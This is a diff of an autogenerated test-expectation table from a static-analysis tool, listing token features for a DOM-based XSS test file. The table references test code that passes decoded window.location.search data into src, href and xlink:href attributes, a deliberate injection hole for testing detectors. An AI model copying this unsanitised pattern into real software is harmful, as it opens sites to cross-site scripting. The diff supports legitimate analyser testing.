autogenerated/Xss/DomBasedXss/tst3.js:2:23:2:74 | exceptional return of decodeU ... str(1)) | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:2:42:2:47 | window | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:2:42:2:47 | window | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:2:42:2:47 | window | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:2:42:2:56 | window.location | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:2:42:2:56 | window.location | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:2:42:2:56 | window.location | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:2:42:2:63 | window. ... .search | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:2:42:2:63 | window. ... .search | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:2:42:2:63 | window. ... .search | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:2:42:2:70 | window. ... .substr | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:2:42:2:70 | window. ... .substr | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:2:42:2:70 | window. ... .substr | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:2:42:2:73 | exceptional return of window. ... bstr(1) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:2:42:2:73 | exceptional return of window. ... bstr(1) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:2:42:2:73 | exceptional return of window. ... bstr(1) | fileImports | | | autogenerated/Xss/DomBasedXss/tst3.js:2:42:2:73 | window. ... bstr(1) | CalleeFlexibleAccessPath | decodeURIComponent | | autogenerated/Xss/DomBasedXss/tst3.js:2:42:2:73 | window. ... bstr(1) | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst3.js:2:42:2:73 | window. ... bstr(1) | contextFunctionInterfaces | | | autogenerated/Xss/DomBasedXss/tst3.js:2:42:2:73 | window. ... bstr(1) | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst3.js:2:42:2:73 | window. ... bstr(1) | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:2:49:2:56 | location | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:2:49:2:56 | location | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:2:49:2:56 | location | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:2:58:2:63 | search | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:2:58:2:63 | search | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:2:58:2:63 | search | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:2:65:2:70 | substr | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:2:65:2:70 | substr | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:2:65:2:70 | substr | fileImports | | | autogenerated/Xss/DomBasedXss/tst3.js:2:72:2:72 | 1 | CalleeFlexibleAccessPath | window.location.search.substr | | autogenerated/Xss/DomBasedXss/tst3.js:2:72:2:72 | 1 | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst3.js:2:72:2:72 | 1 | contextFunctionInterfaces | | | autogenerated/Xss/DomBasedXss/tst3.js:2:72:2:72 | 1 | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst3.js:2:72:2:72 | 1 | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:4:1:4:3 | foo | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:4:1:4:3 | foo | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:4:1:4:3 | foo | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:4:1:4:16 | foo.setAttribute | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:4:1:4:16 | foo.setAttribute | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:4:1:4:16 | foo.setAttribute | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:4:1:4:33 | exceptional return of foo.set ... ta.src) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:4:1:4:33 | exceptional return of foo.set ... ta.src) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:4:1:4:33 | exceptional return of foo.set ... ta.src) | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:4:1:4:33 | foo.set ... ta.src) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:4:1:4:33 | foo.set ... ta.src) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:4:1:4:33 | foo.set ... ta.src) | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:4:5:4:16 | setAttribute | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:4:5:4:16 | setAttribute | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:4:5:4:16 | setAttribute | fileImports | | | autogenerated/Xss/DomBasedXss/tst3.js:4:18:4:22 | "src" | CalleeFlexibleAccessPath | foo.setAttribute | | autogenerated/Xss/DomBasedXss/tst3.js:4:18:4:22 | "src" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst3.js:4:18:4:22 | "src" | contextFunctionInterfaces | | | autogenerated/Xss/DomBasedXss/tst3.js:4:18:4:22 | "src" | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst3.js:4:18:4:22 | "src" | fileImports | | | autogenerated/Xss/DomBasedXss/tst3.js:4:18:4:22 | "src" | receiverName | foo | +| autogenerated/Xss/DomBasedXss/tst3.js:4:25:4:28 | data | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:4:25:4:28 | data | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:4:25:4:28 | data | fileImports | | | autogenerated/Xss/DomBasedXss/tst3.js:4:25:4:32 | data.src | CalleeFlexibleAccessPath | foo.setAttribute | | autogenerated/Xss/DomBasedXss/tst3.js:4:25:4:32 | data.src | InputArgumentIndex | 1 | | autogenerated/Xss/DomBasedXss/tst3.js:4:25:4:32 | data.src | contextFunctionInterfaces | | | autogenerated/Xss/DomBasedXss/tst3.js:4:25:4:32 | data.src | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst3.js:4:25:4:32 | data.src | fileImports | | | autogenerated/Xss/DomBasedXss/tst3.js:4:25:4:32 | data.src | receiverName | foo | +| autogenerated/Xss/DomBasedXss/tst3.js:4:30:4:32 | src | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:4:30:4:32 | src | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:4:30:4:32 | src | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:5:1:5:3 | foo | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:5:1:5:3 | foo | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:5:1:5:3 | foo | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:5:1:5:16 | foo.setAttribute | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:5:1:5:16 | foo.setAttribute | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:5:1:5:16 | foo.setAttribute | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:5:1:5:32 | exceptional return of foo.set ... data.p) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:5:1:5:32 | exceptional return of foo.set ... data.p) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:5:1:5:32 | exceptional return of foo.set ... data.p) | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:5:1:5:32 | foo.set ... data.p) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:5:1:5:32 | foo.set ... data.p) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:5:1:5:32 | foo.set ... data.p) | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:5:5:5:16 | setAttribute | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:5:5:5:16 | setAttribute | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:5:5:5:16 | setAttribute | fileImports | | | autogenerated/Xss/DomBasedXss/tst3.js:5:18:5:23 | "HREF" | CalleeFlexibleAccessPath | foo.setAttribute | | autogenerated/Xss/DomBasedXss/tst3.js:5:18:5:23 | "HREF" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst3.js:5:18:5:23 | "HREF" | contextFunctionInterfaces | | | autogenerated/Xss/DomBasedXss/tst3.js:5:18:5:23 | "HREF" | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst3.js:5:18:5:23 | "HREF" | fileImports | | | autogenerated/Xss/DomBasedXss/tst3.js:5:18:5:23 | "HREF" | receiverName | foo | +| autogenerated/Xss/DomBasedXss/tst3.js:5:26:5:29 | data | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:5:26:5:29 | data | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:5:26:5:29 | data | fileImports | | | autogenerated/Xss/DomBasedXss/tst3.js:5:26:5:31 | data.p | CalleeFlexibleAccessPath | foo.setAttribute | | autogenerated/Xss/DomBasedXss/tst3.js:5:26:5:31 | data.p | InputArgumentIndex | 1 | | autogenerated/Xss/DomBasedXss/tst3.js:5:26:5:31 | data.p | contextFunctionInterfaces | | | autogenerated/Xss/DomBasedXss/tst3.js:5:26:5:31 | data.p | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst3.js:5:26:5:31 | data.p | fileImports | | | autogenerated/Xss/DomBasedXss/tst3.js:5:26:5:31 | data.p | receiverName | foo | +| autogenerated/Xss/DomBasedXss/tst3.js:5:31:5:31 | p | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:5:31:5:31 | p | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:5:31:5:31 | p | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:6:1:6:3 | foo | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:6:1:6:3 | foo | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:6:1:6:3 | foo | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:6:1:6:16 | foo.setAttribute | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:6:1:6:16 | foo.setAttribute | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:6:1:6:16 | foo.setAttribute | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:6:1:6:33 | exceptional return of foo.set ... data.w) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:6:1:6:33 | exceptional return of foo.set ... data.w) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:6:1:6:33 | exceptional return of foo.set ... data.w) | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:6:1:6:33 | foo.set ... data.w) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:6:1:6:33 | foo.set ... data.w) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:6:1:6:33 | foo.set ... data.w) | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:6:5:6:16 | setAttribute | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:6:5:6:16 | setAttribute | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:6:5:6:16 | setAttribute | fileImports | | | autogenerated/Xss/DomBasedXss/tst3.js:6:18:6:24 | "width" | CalleeFlexibleAccessPath | foo.setAttribute | | autogenerated/Xss/DomBasedXss/tst3.js:6:18:6:24 | "width" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst3.js:6:18:6:24 | "width" | contextFunctionInterfaces | | | autogenerated/Xss/DomBasedXss/tst3.js:6:18:6:24 | "width" | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst3.js:6:18:6:24 | "width" | fileImports | | | autogenerated/Xss/DomBasedXss/tst3.js:6:18:6:24 | "width" | receiverName | foo | +| autogenerated/Xss/DomBasedXss/tst3.js:6:27:6:30 | data | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:6:27:6:30 | data | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:6:27:6:30 | data | fileImports | | | autogenerated/Xss/DomBasedXss/tst3.js:6:27:6:32 | data.w | CalleeFlexibleAccessPath | foo.setAttribute | | autogenerated/Xss/DomBasedXss/tst3.js:6:27:6:32 | data.w | InputArgumentIndex | 1 | | autogenerated/Xss/DomBasedXss/tst3.js:6:27:6:32 | data.w | contextFunctionInterfaces | | | autogenerated/Xss/DomBasedXss/tst3.js:6:27:6:32 | data.w | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst3.js:6:27:6:32 | data.w | fileImports | | | autogenerated/Xss/DomBasedXss/tst3.js:6:27:6:32 | data.w | receiverName | foo | +| autogenerated/Xss/DomBasedXss/tst3.js:6:32:6:32 | w | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:6:32:6:32 | w | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:6:32:6:32 | w | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:7:1:7:3 | foo | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:7:1:7:3 | foo | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:7:1:7:3 | foo | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:7:1:7:16 | foo.setAttribute | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:7:1:7:16 | foo.setAttribute | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:7:1:7:16 | foo.setAttribute | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:7:1:7:38 | exceptional return of foo.set ... data.p) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:7:1:7:38 | exceptional return of foo.set ... data.p) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:7:1:7:38 | exceptional return of foo.set ... data.p) | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:7:1:7:38 | foo.set ... data.p) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:7:1:7:38 | foo.set ... data.p) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:7:1:7:38 | foo.set ... data.p) | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:7:5:7:16 | setAttribute | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:7:5:7:16 | setAttribute | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:7:5:7:16 | setAttribute | fileImports | | | autogenerated/Xss/DomBasedXss/tst3.js:7:18:7:29 | "xlink:href" | CalleeFlexibleAccessPath | foo.setAttribute | | autogenerated/Xss/DomBasedXss/tst3.js:7:18:7:29 | "xlink:href" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst3.js:7:18:7:29 | "xlink:href" | contextFunctionInterfaces | | | autogenerated/Xss/DomBasedXss/tst3.js:7:18:7:29 | "xlink:href" | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst3.js:7:18:7:29 | "xlink:href" | fileImports | | | autogenerated/Xss/DomBasedXss/tst3.js:7:18:7:29 | "xlink:href" | receiverName | foo | +| autogenerated/Xss/DomBasedXss/tst3.js:7:32:7:35 | data | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:7:32:7:35 | data | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:7:32:7:35 | data | fileImports | | | autogenerated/Xss/DomBasedXss/tst3.js:7:32:7:37 | data.p | CalleeFlexibleAccessPath | foo.setAttribute | | autogenerated/Xss/DomBasedXss/tst3.js:7:32:7:37 | data.p | InputArgumentIndex | 1 | | autogenerated/Xss/DomBasedXss/tst3.js:7:32:7:37 | data.p | contextFunctionInterfaces | | | autogenerated/Xss/DomBasedXss/tst3.js:7:32:7:37 | data.p | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst3.js:7:32:7:37 | data.p | fileImports | | | autogenerated/Xss/DomBasedXss/tst3.js:7:32:7:37 | data.p | receiverName | foo | +| autogenerated/Xss/DomBasedXss/tst3.js:7:37:7:37 | p | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:7:37:7:37 | p | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:7:37:7:37 | p | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:9:1:9:3 | foo | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:9:1:9:3 | foo | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:9:1:9:3 | foo | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:9:1:9:18 | foo.setAttributeNS | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:9:1:9:18 | foo.setAttributeNS | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:9:1:9:18 | foo.setAttributeNS | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:9:1:9:43 | exceptional return of foo.set ... data.p) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:9:1:9:43 | exceptional return of foo.set ... data.p) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:9:1:9:43 | exceptional return of foo.set ... data.p) | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:9:1:9:43 | foo.set ... data.p) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:9:1:9:43 | foo.set ... data.p) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:9:1:9:43 | foo.set ... data.p) | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:9:5:9:18 | setAttributeNS | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:9:5:9:18 | setAttributeNS | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:9:5:9:18 | setAttributeNS | fileImports | | | autogenerated/Xss/DomBasedXss/tst3.js:9:20:9:26 | 'xlink' | CalleeFlexibleAccessPath | foo.setAttributeNS | | autogenerated/Xss/DomBasedXss/tst3.js:9:20:9:26 | 'xlink' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst3.js:9:20:9:26 | 'xlink' | contextFunctionInterfaces | | @@ -15824,12 +111416,33 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst3.js:9:29:9:34 | 'href' | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst3.js:9:29:9:34 | 'href' | fileImports | | | autogenerated/Xss/DomBasedXss/tst3.js:9:29:9:34 | 'href' | receiverName | foo | +| autogenerated/Xss/DomBasedXss/tst3.js:9:37:9:40 | data | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:9:37:9:40 | data | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:9:37:9:40 | data | fileImports | | | autogenerated/Xss/DomBasedXss/tst3.js:9:37:9:42 | data.p | CalleeFlexibleAccessPath | foo.setAttributeNS | | autogenerated/Xss/DomBasedXss/tst3.js:9:37:9:42 | data.p | InputArgumentIndex | 2 | | autogenerated/Xss/DomBasedXss/tst3.js:9:37:9:42 | data.p | contextFunctionInterfaces | | | autogenerated/Xss/DomBasedXss/tst3.js:9:37:9:42 | data.p | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst3.js:9:37:9:42 | data.p | fileImports | | | autogenerated/Xss/DomBasedXss/tst3.js:9:37:9:42 | data.p | receiverName | foo | +| autogenerated/Xss/DomBasedXss/tst3.js:9:42:9:42 | p | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:9:42:9:42 | p | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:9:42:9:42 | p | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:10:1:10:3 | foo | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:10:1:10:3 | foo | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:10:1:10:3 | foo | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:10:1:10:18 | foo.setAttributeNS | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:10:1:10:18 | foo.setAttributeNS | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:10:1:10:18 | foo.setAttributeNS | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:10:1:10:44 | exceptional return of foo.set ... data.p) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:10:1:10:44 | exceptional return of foo.set ... data.p) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:10:1:10:44 | exceptional return of foo.set ... data.p) | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:10:1:10:44 | foo.set ... data.p) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:10:1:10:44 | foo.set ... data.p) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:10:1:10:44 | foo.set ... data.p) | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:10:5:10:18 | setAttributeNS | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:10:5:10:18 | setAttributeNS | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:10:5:10:18 | setAttributeNS | fileImports | | | autogenerated/Xss/DomBasedXss/tst3.js:10:20:10:27 | 'foobar' | CalleeFlexibleAccessPath | foo.setAttributeNS | | autogenerated/Xss/DomBasedXss/tst3.js:10:20:10:27 | 'foobar' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst3.js:10:20:10:27 | 'foobar' | contextFunctionInterfaces | | @@ -15842,12 +111455,33 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst3.js:10:30:10:35 | 'href' | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst3.js:10:30:10:35 | 'href' | fileImports | | | autogenerated/Xss/DomBasedXss/tst3.js:10:30:10:35 | 'href' | receiverName | foo | +| autogenerated/Xss/DomBasedXss/tst3.js:10:38:10:41 | data | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:10:38:10:41 | data | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:10:38:10:41 | data | fileImports | | | autogenerated/Xss/DomBasedXss/tst3.js:10:38:10:43 | data.p | CalleeFlexibleAccessPath | foo.setAttributeNS | | autogenerated/Xss/DomBasedXss/tst3.js:10:38:10:43 | data.p | InputArgumentIndex | 2 | | autogenerated/Xss/DomBasedXss/tst3.js:10:38:10:43 | data.p | contextFunctionInterfaces | | | autogenerated/Xss/DomBasedXss/tst3.js:10:38:10:43 | data.p | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst3.js:10:38:10:43 | data.p | fileImports | | | autogenerated/Xss/DomBasedXss/tst3.js:10:38:10:43 | data.p | receiverName | foo | +| autogenerated/Xss/DomBasedXss/tst3.js:10:43:10:43 | p | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:10:43:10:43 | p | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:10:43:10:43 | p | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:11:1:11:3 | foo | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:11:1:11:3 | foo | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:11:1:11:3 | foo | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:11:1:11:18 | foo.setAttributeNS | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:11:1:11:18 | foo.setAttributeNS | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:11:1:11:18 | foo.setAttributeNS | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:11:1:11:42 | exceptional return of foo.set ... data.w) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:11:1:11:42 | exceptional return of foo.set ... data.w) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:11:1:11:42 | exceptional return of foo.set ... data.w) | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:11:1:11:42 | foo.set ... data.w) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:11:1:11:42 | foo.set ... data.w) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:11:1:11:42 | foo.set ... data.w) | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:11:5:11:18 | setAttributeNS | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:11:5:11:18 | setAttributeNS | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:11:5:11:18 | setAttributeNS | fileImports | | | autogenerated/Xss/DomBasedXss/tst3.js:11:20:11:24 | 'baz' | CalleeFlexibleAccessPath | foo.setAttributeNS | | autogenerated/Xss/DomBasedXss/tst3.js:11:20:11:24 | 'baz' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst3.js:11:20:11:24 | 'baz' | contextFunctionInterfaces | | @@ -15860,24 +111494,168 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst3.js:11:27:11:33 | 'width' | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst3.js:11:27:11:33 | 'width' | fileImports | | | autogenerated/Xss/DomBasedXss/tst3.js:11:27:11:33 | 'width' | receiverName | foo | +| autogenerated/Xss/DomBasedXss/tst3.js:11:36:11:39 | data | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:11:36:11:39 | data | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:11:36:11:39 | data | fileImports | | | autogenerated/Xss/DomBasedXss/tst3.js:11:36:11:41 | data.w | CalleeFlexibleAccessPath | foo.setAttributeNS | | autogenerated/Xss/DomBasedXss/tst3.js:11:36:11:41 | data.w | InputArgumentIndex | 2 | | autogenerated/Xss/DomBasedXss/tst3.js:11:36:11:41 | data.w | contextFunctionInterfaces | | | autogenerated/Xss/DomBasedXss/tst3.js:11:36:11:41 | data.w | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst3.js:11:36:11:41 | data.w | fileImports | | | autogenerated/Xss/DomBasedXss/tst3.js:11:36:11:41 | data.w | receiverName | foo | +| autogenerated/Xss/DomBasedXss/tst3.js:11:41:11:41 | w | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:11:41:11:41 | w | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:11:41:11:41 | w | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:14:10:14:10 | p | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:14:10:14:10 | p | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:14:10:14:10 | p | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:14:10:14:10 | p | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:14:10:14:10 | p | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:14:10:14:10 | p | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:14:15:14:18 | data | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:14:15:14:18 | data | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:14:15:14:18 | data | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:15:3:15:5 | foo | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:15:3:15:5 | foo | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:15:3:15:5 | foo | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:15:3:15:18 | foo.setAttribute | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:15:3:15:18 | foo.setAttribute | 